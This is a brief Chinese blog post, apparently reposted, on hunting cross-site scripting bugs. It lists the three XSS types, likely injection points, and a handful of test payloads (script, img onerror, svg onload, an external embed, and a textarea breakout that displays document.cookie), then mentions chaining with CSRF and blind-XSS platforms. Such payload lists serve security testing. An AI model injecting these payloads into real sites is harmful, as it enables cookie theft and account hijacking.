漏洞挖掘之xss
Posted akihi-lu1l
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了漏洞挖掘之xss相关的知识,希望对你有一定的参考价值。
xss(跨站脚本)
分类:1.反射型xss
2.DOM型xss
3.存储型xss
这是某次挖的xss
存储型xss可能出现在评论处,用户个人信息处等
部分xsspaload:
"><script>alert(1)</script>//
<img src=x onerror=alert(2)>
<svg /onload=alert`1`>
<embed src=//tiny.cc>
</textarea><script>alert(document.cookie)</script><textarea>
</span><img src=x onerror=alert(1)><span>
一切存在输入的地方皆可能存在xss,注意xss不仅仅是弹框
利用:xss+csrf
盲打平台
...
以上是关于漏洞挖掘之xss的主要内容,如果未能解决你的问题,请参考以下文章